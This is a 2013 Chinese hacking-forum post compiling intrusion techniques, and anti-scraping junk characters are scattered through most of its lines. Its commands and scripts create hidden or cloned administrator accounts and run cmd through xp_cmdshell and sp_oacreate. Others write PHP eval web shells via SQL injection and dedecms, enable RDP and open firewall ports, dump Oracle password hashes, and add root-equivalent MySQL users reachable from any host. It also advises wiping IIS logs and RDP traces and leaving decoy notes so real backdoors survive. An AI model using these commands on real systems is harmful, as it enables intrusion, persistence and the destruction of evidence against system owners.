找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4932|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
' g1 }0 }# P5 b) S* A
1.net user administrator /passwordreq:no+ o8 O2 S, p1 [+ |; J
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了- p, g7 |2 U: b0 |+ _1 G, _
2.比较巧妙的建克隆号的步骤4 R0 H8 Z4 J1 }2 K
先建一个user的用户4 e$ a: V3 `( ^; T
然后导出注册表。然后在计算机管理里删掉3 Q& B( C1 ]: N5 m8 x3 B2 a; ~
在导入,在添加为管理员组
8 n. r; Q" @& W* J/ \( S8 V) m5 M0 k3.查radmin密码  F' O- J: K. n/ ?* n
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg0 `. s6 X1 n0 a, n4 b6 E+ ^
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
4 H0 }3 w, M% ?8 c1 N' {建立一个"services.exe"的项
& M7 b/ q, ]9 N1 p再在其下面建立(字符串值)
% R1 C) b1 F4 k9 g0 Y. a) J  h键值为mu ma的全路径
) Y- t9 c8 n# L- C( v1 Y7 ~7 J5.runas /user:guest cmd
/ m* o- N+ b( v3 J0 j; @0 j测试用户权限!
6 ~9 o. c* T& k; e3 ?! w% }2 j3 ?0 q6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
) `5 r5 R7 |7 v1 f( D+ G7.入侵后漏洞修补、痕迹清理,后门置放:4 A, _5 E, X: N$ V" u! D1 H
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门# Q# ]' K  [; }+ v! X0 _: j
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
0 G( O  r  u# p' s& f- g4 P5 c( v& S! a7 z& O
for example8 O* c) D+ _; D$ |/ }7 s
7 P% _9 ^( u9 t9 [! Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
; E; j  n. Y, D( s  ?1 n3 h. D2 |6 H. l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
% r9 s  s' Z9 Q6 w& x7 C* I6 ~: E: H& D, V8 \9 P: Y# u4 k0 C
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了) X1 d' j) e. h# U: P
如果要启用的话就必须把他加到高级用户模式: P; b- l0 w! b0 w7 j' |
可以直接在注入点那里直接注入
" ^8 r* [5 Z. X3 A8 [! W# }id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
2 U" X# ?$ I9 m, z8 i然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--; b! Q. O. W6 L, m! E( C/ @
或者- v$ l/ M3 f6 a7 x$ ~, C* s6 R
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 U8 w0 T% B- K+ n& b  v
来恢复cmdshell。
, Z0 R8 a# ]# r+ K& [5 T/ E( l  M
3 z: ^: T5 s$ Y) Y& d分析器4 C$ z8 i' I0 |9 N  x* B4 D
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
7 h* l) o" P: D/ _- q2 b+ m然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
9 J1 U/ [9 p3 Z, v& d10.xp_cmdshell新的恢复办法
6 W2 z/ Z( N7 W; L$ D( t: d  gxp_cmdshell新的恢复办法+ g6 @' ^$ l- @9 z' [- K( S9 @/ P( i1 b
扩展储存过程被删除以后可以有很简单的办法恢复:3 J) g6 z& T) X- m  J3 P- V
删除
/ U/ p5 x  a9 B' S7 Qdrop procedure sp_addextendedproc9 p8 ?% J2 h* R' t/ z' P
drop procedure sp_oacreate
6 F2 G* i- ~6 ~' G7 yexec sp_dropextendedproc 'xp_cmdshell'
8 }! |: o! |) r+ k" v8 @- l
  U1 w# A8 C" f2 G# J恢复
/ {% [! M8 s9 X( rdbcc addextendedproc ("sp_oacreate","odsole70.dll")0 _; ^9 r4 P8 k. V1 t
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")7 _. W# ^" Y' L8 B' W% e& I
* n2 l/ h4 ]0 {$ U* I$ S
这样可以直接恢复,不用去管sp_addextendedproc是不是存在; R: A$ Y0 u% k8 Y; A
0 @$ b9 z. U% M. e# x% H
-----------------------------# \' _" o4 p. m2 {( v- _5 c
1 N; Z- j& |9 n0 u
删除扩展存储过过程xp_cmdshell的语句:' {& B6 ~2 m; ?, r% E: s3 ^7 @! w
exec sp_dropextendedproc 'xp_cmdshell'
. f, T. c* _4 h7 }* z  ~* i, D% x9 u0 Q; n( F
恢复cmdshell的sql语句0 w' j% \6 Y, c. Z; z- \2 t" n
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'+ G* D9 O" P4 i1 r: L/ T
+ ]' p6 g' B# T( N# M0 r
* k: O1 j( g) n+ ]/ a) l
开启cmdshell的sql语句
2 c$ a- }1 R, _# r9 ?. N- ^1 s
( }" B+ B+ f+ G- k+ K$ `exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" U' ^  `) t# O' k( H  m: g% q4 n
" \) ^" D2 Y0 ^2 M6 I" n+ f0 w判断存储扩展是否存在
0 T: a6 Y+ V& k& V: p; Gselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'* Q4 }" v; l; h& c9 X
返回结果为1就ok5 J# n/ ^$ }4 T4 ?

$ M, k/ i/ U; G/ U恢复xp_cmdshell* S2 s6 s( z: U: j
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'7 L) F& n6 W- t$ y9 w( }1 s* m
返回结果为1就ok
- v0 G& h6 h, H6 ^" h: O; d1 I" h1 t8 X" ]# _
否则上传xplog7.0.dll
2 Q8 r# \! `6 C1 T6 vexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
# G/ S! f6 b* K. J; B5 j: c
! `4 L, f" l  |堵上cmdshell的sql语句* T6 J. A, Q4 X. b
sp_dropextendedproc "xp_cmdshel
: b: x& J- ^- W( T-------------------------- a7 W5 h" ^: \; M
清除3389的登录记录用一条系统自带的命令:+ X" f. x* N$ ?  q
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f. V" m3 u! h' h1 s- w3 e9 I
$ S9 I3 [4 `9 S  H2 u
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
: u. Y0 |  b) A! ~在 mysql里查看当前用户的权限' ?7 V" G* x4 l1 D3 u% j% S9 w( E
show grants for  
# S/ ?% \& n# F5 R" b
0 m6 v/ F$ J% {以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
, A) @. @6 d/ O9 A
0 W" Q3 o" f" E2 p
* D. d! ]: s; W6 A( K/ F3 u2 |Create USER 'itpro'@'%' IDENTIFIED BY '123';8 j0 j( x/ Q4 K1 @

; g4 x3 X7 o; B1 y2 }; i" xGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
7 `$ r) d9 w' f: n; \0 D6 B* C$ L: Q
7 V% K; w2 g* u& }& x% b" EMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
8 [% h( \  W) Y9 r' H$ G  u& Z3 X9 R5 \9 t
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;3 q- m* f1 P" J1 V

# p( o# D- p8 b% R  t. g! H搞完事记得删除脚印哟。
" k+ L( U- }. I7 a# K' R8 Y# N9 b; b) W1 n: |
Drop USER 'itpro'@'%';! `! f! s6 c5 G

# n7 q& R6 b9 X, i) N$ W* |Drop DATABASE IF EXISTS `itpro` ;# m) L: f. q+ ?% ]4 `) s

- n1 _) g8 T9 E2 t' V2 K6 ^, C当前用户获取system权限9 p( z" c6 U# p  u; Y: d$ W. `+ D3 p
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact6 D, C) `7 i% @; U
sc start SuperCMD2 K2 V7 \  i6 X! F( D! I
程序代码
) k7 A# }4 Z) w! D<SCRIPT LANGUAGE="VBScript">
* e6 a' S& U0 l4 r0 ~& xset wsnetwork=CreateObject("WSCRIPT.NETWORK")6 T, R; b4 D: R4 b
os="WinNT://"&wsnetwork.ComputerName
: L; e$ n" \  H& ~6 i) bSet ob=GetObject(os)
% p: K1 J  W0 w0 M( }' ?Set oe=GetObject(os&"/Administrators,group")6 O2 D' n3 t, J  r) g, N
Set od=ob.Create("user","nosec")
2 {: ~# i/ x* g) j! Jod.SetPassword "123456abc!@#"6 s7 \; S/ d' f$ O
od.SetInfo
9 m; ^* p) F1 j5 a$ q( {& |Set of=GetObject(os&"/nosec",user)& l* \9 z7 G# @6 S9 ]- A
oe.add os&"/nosec"
: ]: @) p- B, v7 B</Script>
+ \# Q0 _: J0 b3 \5 ?5 X: t  w<script language=javascript>window.close();</script>% k! U! |2 X2 F0 d0 E! v1 G, Y2 `: N

5 r) |$ }7 I( e  H% t6 N8 a: x2 k7 b4 a, x6 s- O
: Z6 t, {& G/ F2 j( j2 D8 b: Y

7 L. Q8 \( |0 p突破验证码限制入后台拿shell
" S5 d- |& Z$ ]程序代码
" j! d0 N( w* ^7 D$ d( [7 N; PREGEDIT4 $ V- m/ o4 `  k  P( `* l. M
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
  @0 p) p) C9 V: Q"BlockXBM"=dword:00000000
+ W1 d" _+ t% w% i8 _+ ?( |6 Q
5 Q  }; Z1 l! u保存为code.reg,导入注册表,重器IE6 Q+ A) t  I* ?' L5 K" ~5 p  _
就可以了1 U7 B. j/ ^1 y4 B8 o
union写马
9 h) K& t* K$ v  L; A( e7 Z( x程序代码$ ], b9 W" n4 B5 e
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
" u0 l5 h; B( X# S
5 x: b/ O2 O3 Z" G+ {应用在dedecms注射漏洞上,无后台写马3 |5 ~& J5 f; r
dedecms后台,无文件管理器,没有outfile权限的时候2 e1 S- D. \- k9 ?
在插件管理-病毒扫描里" C* C  g( i8 f/ m6 M* E
写一句话进include/config_hand.php里5 ?& u0 E. t1 I. [+ o
程序代码
4 ~5 i0 q6 b, d- j>';?><?php @eval($_POST[cmd]);?>$ Z9 M' e, ^" Q" h+ |

7 q  l: D. V' [* w2 X: {, R/ |
% W/ m$ p( h8 c$ z+ x如上格式
: Z3 E' o* c; _/ P) }6 L: R+ k% D  `7 p  c* T, t4 v
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
  i* |8 ^( h3 B$ q: D# E5 Y7 R4 Z程序代码: l3 p9 o  V* t# d7 V4 L
select username,password from dba_users;0 q& n6 V3 q& V9 [* V. s+ S  \: R* a
4 Y9 Z/ ^  o5 I. F% |

7 p) ?# k* Q; C2 [7 R5 n2 Imysql远程连接用户
$ O  p3 }: d/ G" J/ M程序代码
: s- E: _/ S/ [* x2 m1 M
# |* Y4 t$ R4 U) NCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';" J9 r2 [* r- A; r2 {9 K
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
9 \- X) \' Y5 n) e* fMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
$ ?- U' f, R& d4 cMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
0 ?5 L2 `( W# O& D3 J8 b5 t$ a9 D: D8 U% e; ~
. U/ o  c, ~8 c  a# h

+ g% P& m6 S! K7 D4 o* D" \3 t9 r6 j- K+ |1 s+ x6 R
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 06 u' j% V. Y3 f$ ^6 K
5 B2 {, j" Y: l% [6 S# y
1.查询终端端口
3 s- d9 d4 Z- \* [' ?& K% X& {# e5 G3 Z0 W
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
: P& T: M% X/ Z$ R/ `
. f. k# F; V7 r2 {通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
. w4 F* _$ N# atype tsp.reg
- r* |6 r5 B4 a8 k7 j. S9 v! X6 y' p. W( X/ b
2.开启XP&2003终端服务5 U0 U2 S  r: ?1 M, @

/ P" e* `. E% b9 b
0 ^& d# j9 I5 [0 O8 a: Z/ ~REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
# }8 H3 K; d. Q$ p
/ V2 w- w. }1 G9 A8 ]5 b
; M, Z9 q9 p9 ]6 }  BREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
" b, _& R; M5 l( P( g' p2 R, X2 s1 A/ P4 e0 P! A8 T+ o3 m
3.更改终端端口为20008(0x4E28)# J' p+ t% J* K
0 ?9 \; e2 Q6 R8 f5 N3 T- X
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f3 a8 e1 h; Y- g+ z% ~
1 e. |( Y7 m, C: a" E
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
9 a# A: Q: h* |# I: {
9 ?: _: m1 E9 Z+ Y& Y; B4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制3 ^9 `; u& _6 g0 [# a
$ ]4 B5 n4 W4 _
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f) l/ W# R2 N! E( V0 e% y
  l$ s$ {1 s. I1 B, I
7 n# }* r( N! }  |/ }9 a. N
5.开启Win2000的终端,端口为3389(需重启)4 ?, j, M# c- p6 ]& k
6 f- S8 I) e: O) a  G
echo Windows Registry Editor Version 5.00 >2000.reg
- n8 {% M9 z( Z+ u* G. ], m: I+ Mecho. >>2000.reg
: Q+ A$ x( M4 h3 Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
" r) h- j( w4 N, z! w" j- `9 Lecho "Enabled"="0" >>2000.reg
  U% q* C( \+ y( w) I. w. K  uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
% N3 S% w9 @3 e* p1 C$ ^echo "ShutdownWithoutLogon"="0" >>2000.reg & R# C4 c; f& @" R  o$ `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg ) v& X2 ~' J" l' ?6 L
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
& N# j4 K( i5 p5 recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
1 Y! d1 A4 V* o1 Jecho "TSEnabled"=dword:00000001 >>2000.reg : j) r5 J# ~- X% l6 z; C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
, ^3 T- h/ u8 l7 ?  M0 h# x1 kecho "Start"=dword:00000002 >>2000.reg ; [- i' P5 H& o4 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg % R3 }4 S& A) w8 X% q5 p* l
echo "Start"=dword:00000002 >>2000.reg , p/ T2 g  R; Y5 b
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg / t% K& Z, M2 e, f# F' f9 r5 G  E
echo "Hotkey"="1" >>2000.reg $ E9 {8 u: M8 A$ Q1 m$ @" N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
0 y+ y7 Q1 Y) }: `- h6 o5 xecho "ortNumber"=dword:00000D3D >>2000.reg
. _  [: F; G" x3 v$ lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
% r; k: I0 s5 j/ `echo "ortNumber"=dword:00000D3D >>2000.reg
* i# S  X" i) l" t) O
) C/ q" }) u0 f6 ~6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
  s1 ~: g6 C. m  q& |
. e0 e/ D: Z) w9 ^@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
$ N# ?+ o+ @+ I+ H7 D3 E. h(set inf=InstallHinfSection DefaultInstall)
! h9 ~) l& x4 x' `' J  decho signature=$chicago$ >> restart.inf
9 o% M/ r- U' i1 Oecho [defaultinstall] >> restart.inf
. I0 b9 U/ y9 }- ~, e& ^& _rundll32 setupapi,%inf% 1 %temp%\restart.inf
; K! o8 ^2 Q( X# Z' }( O5 O. S9 E  }# ^, D" x& s  _, P
- R7 S2 \$ u! t9 e
7.禁用TCP/IP端口筛选 (需重启)( t2 G( c" D4 I' }& y5 `, ]
! v, Q) l) @9 B& ?, g$ g3 O3 T, r
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f' X; e' x6 G5 Z) F6 @. @$ C& h
$ z6 z) m- h/ x
8.终端超出最大连接数时可用下面的命令来连接
8 g( E4 f3 Z9 `- j5 T% k% ~! C  X0 t7 ~% R1 t( H% a5 ~; }  D, F
mstsc /v:ip:3389 /console& k" {1 h5 g8 a) b
& a& H- F0 \$ c; U
9.调整NTFS分区权限1 v& j# c  u! V! b
) P$ J$ _: M6 D& l( t' j+ o
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)( L5 _) ~! N( Q) W2 K

& U. T- D4 |  B% E# Bcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)* e! y, w2 h, l& v. b

# r: c. s" M, K2 N- u------------------------------------------------------# h. h2 {$ l) |
3389.vbs
/ S+ S. k. s% |% I6 SOn Error Resume Next
  V6 l# v# ?/ ]# g7 B0 hconst HKEY_LOCAL_MACHINE = &H80000002
1 k, v# d! x' W. Z- x3 astrComputer = "."' W( H; a1 j9 i/ S9 P0 C' n
Set StdOut = WScript.StdOut& }! t* [  j" r2 v
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
6 L7 y9 z, O, N- w- T+ kstrComputer & "\root\default:StdRegProv")  u) U* p/ f% v$ M& z, G% t
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
' y3 A# x% G  f. uoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
2 e# l1 g! R6 q) ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"7 P& ?( L  G! i' u- m: Z% ^( |
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath" G- e% g4 p/ N* i6 r- L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"4 o0 I, y" u( m
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
2 w: U9 |! \' ZstrValueName = "fDenyTSConnections"
; O* P* A1 I; \! ~( v/ L" H  ^dwValue = 0
8 \% u: X: K9 Uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 @) p; S2 I2 d6 w+ x! T
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( `' f1 W# T1 e( G5 y% `strValueName = "ortNumber"- H7 r% T2 Q7 ?6 T6 K. Z: o
dwValue = 3389/ Q; m% U9 y; ~' b8 v
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 R1 X/ m) l8 x7 L, d; Y9 istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
  [# Y9 \3 C0 j2 FstrValueName = "ortNumber", C$ S4 j3 m$ i- A- o/ u: V
dwValue = 3389
" K$ N- \- A$ {# zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue; a6 }, i) V5 \/ T
Set R = CreateObject("WScript.Shell") 9 Q9 i) a3 b' j% W/ J9 |
R.run("Shutdown.exe -f -r -t 0")
- v& ^0 X. H4 j9 x/ n3 p0 M" ~, k5 l2 f4 K3 `
删除awgina.dll的注册表键值
* Y  o" p) Q+ ~( t程序代码
; S  B7 [( h6 r' r1 N/ Z, V3 `8 T4 A* q! l' H: E1 ]
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f5 o4 f6 H- ?- x/ ]. B

+ @* K) q8 Z7 z# @' u: l8 H
2 S6 A* k9 T- c
0 s1 Q. J: W9 r3 D# ?8 X
7 r+ {* y6 y, a. z5 x" ]程序代码
8 s  x  v' E; K& D) Q6 q. tHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
! r7 f7 p. C3 _4 J' J1 U& M
" G' w% k% D9 q6 N设置为1,关闭LM Hash, Y1 ^6 M. r7 ^. P$ w. q* R& D; N

7 c* x1 D) t2 o( L. E数据库安全:入侵Oracle数据库常用操作命令
3 g/ O6 v2 S, G' t7 a3 U3 O最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
* B) H  R+ z+ h9 T1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
# ]0 E1 x0 \$ B& O2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
) G' B6 E( N/ D5 H/ a3、SQL>connect / as sysdba ;(as sysoper)或
: R3 F2 B) @; T# w: Dconnect internal/oracle AS SYSDBA ;(scott/tiger)0 Q  P  I0 ]0 @- `
conn sys/change_on_install as sysdba;: x6 c  m( F" q6 i
4、SQL>startup; 启动数据库实例
  |) Y) h6 W: q8 X+ U5、查看当前的所有数据库: select * from v$database;
7 l1 z/ k8 N# ]9 M  ?0 Sselect name from v$database;
. ~. `  B' D7 L6 K  M6、desc v$databases; 查看数据库结构字段
* G/ f5 |  j1 x) i7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
7 t$ i. V) l  ?7 b( z6 p- L% xSQL>select * from V_$PWFILE_USERS;/ x  B4 G" l- d' w
Show user;查看当前数据库连接用户  {7 e2 P+ Y8 w+ f4 t  l
8、进入test数据库:database test;
3 |2 G& I8 C! W9、查看所有的数据库实例:select * from v$instance;1 j* q8 P9 o. P- L; T6 H' S
如:ora9i' z5 J1 e/ l% ~2 R% s# V6 A
10、查看当前库的所有数据表:: A( q& \( s+ D8 @7 `% K" i
SQL> select TABLE_NAME from all_tables;
9 a( m3 X/ x! }select * from all_tables;
; ^9 j" ?# v$ U  B0 W% q5 |: }3 MSQL> select table_name from all_tables where table_name like '%u%';
! [% _5 A3 Z& D4 w: FTABLE_NAME
" p7 t2 T* J  W# B6 K! X1 I, g------------------------------9 h% E0 F9 U9 [0 [. o, z% _
_default_auditing_options_4 O  G( Y: t* f5 S1 u$ Q" a
11、查看表结构:desc all_tables;5 t! u7 ~( r+ a" h3 T2 S  k
12、显示CQI.T_BBS_XUSER的所有字段结构:
; F5 C  _" q3 N& A2 qdesc CQI.T_BBS_XUSER;
4 N2 l/ c7 R8 m0 E# E5 R- m7 C9 y13、获得CQI.T_BBS_XUSER表中的记录:6 w" m: R5 d* u" h: O
select * from CQI.T_BBS_XUSER;
/ l3 d1 v7 B% x2 Z9 |3 h0 V9 W14、增加数据库用户:(test11/test)
, K+ y8 d8 _) n; h3 b9 dcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;; ~1 v% G3 m  a
15、用户授权:
7 c" s* x  L9 }- u' P6 }grant connect,resource,dba to test11;; v4 H# ^. [0 ?. u8 w
grant sysdba to test11;- a$ n) \" H1 v6 v, D7 D
commit;. i, v& y, h: M% x, ^
16、更改数据库用户的密码:(将sys与system的密码改为test.)
  D) x% }  d- e1 Q  ?& Y9 ]alter user sys indentified by test;3 X) E  m* S; ~5 y/ }, ?& u
alter user system indentified by test;
2 @: ^- Z9 u  h+ q5 [# N3 _
) C+ n$ }. F% B0 |0 DapplicationContext-util.xml* J$ ]' i$ ?, l; V, v8 |/ F
applicationContext.xml
( S, U  [' }7 {$ qstruts-config.xml
7 o. x+ I9 T7 |; I$ Gweb.xml. a, m3 ?6 [: r& r
server.xml
) r3 y( r! B( c! wtomcat-users.xml& l) |$ m! R  E5 U8 d& E
hibernate.cfg.xml) k; I& y; }' {, y, w, R
database_pool_config.xml
) U1 d. }5 f5 U) ^
- J" Q- J1 h* ~7 Q# r6 j. ^% Z  o( j3 I
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
- `* `: S9 ?8 a, D\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini1 e  p9 l4 b& v. O( H9 J4 `7 @
\WEB-INF\struts-config.xml  文件目录结构
# A+ j1 f3 R' t. h3 E* f* u0 J, a
+ v: g# S& B3 q  \  w0 p. P' Rspring.properties 里边包含hibernate.cfg.xml的名称) F  \$ ^7 X# r6 V( }/ x# D: L
, F, i# M3 o' C: F5 j) @( U

9 E0 c/ ]1 L( _) r) r. T) z/ ~C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml4 s) h/ Q: ~" f

. F9 y+ p4 {' I+ W如果都找不到  那就看看class文件吧。。
% ~$ n2 W8 o9 p8 Q0 p
& |9 P* q, v8 K% N2 p测试1:8 X$ ?2 c/ r- Z% O4 z
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1  p5 O: X% r" x+ O8 l" ]

$ M% N. M( }: E2 R/ D测试2:. D/ ~) A8 k" ~: x& {5 ]% @

1 [; Y3 Z" e9 \, C9 K9 ]3 kcreate table dirs(paths varchar(100),paths1 varchar(100), id int)3 j: A+ u. M; t) Z- M9 T5 P3 U, Z

4 n3 P0 F2 B: b, d! h. Vdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
1 [8 _* Y! W" K+ B5 N0 e0 W* R7 O' U' U: W- y/ z% P% w
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1+ d, [3 M+ f2 r9 r: r0 C2 h2 U

0 z/ B6 D2 u2 x% U4 e查看虚拟机中的共享文件:0 ?' [1 L! z" S* m% t
在虚拟机中的cmd中执行
' m2 {( q, J+ e: W$ c0 ?5 z\\.host\Shared Folders
9 n% m# ]6 m8 U& l0 }
$ L1 _+ f5 s! G( gcmdshell下找终端的技巧1 N6 k3 ?# ?5 l6 o* l# x* x; x6 \0 e
找终端: % ?( p4 [: P* t( F% o% ?* s- z
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! / e; W7 W! X" a
   而终端所对应的服务名为:TermService ! |. w/ d( F1 z. u! I
第二步:用netstat -ano命令,列出所有端口对应的PID值!
: k! N& {: f( v! T+ C   找到PID值所对应的端口  A# L4 {9 C( ?5 t$ S( s* a6 Y" E$ S
0 s7 E" K3 d8 Q4 f4 k* o
查询sql server 2005中的密码hash7 t& n1 ~8 w. ?/ N6 C/ X& h# N+ O
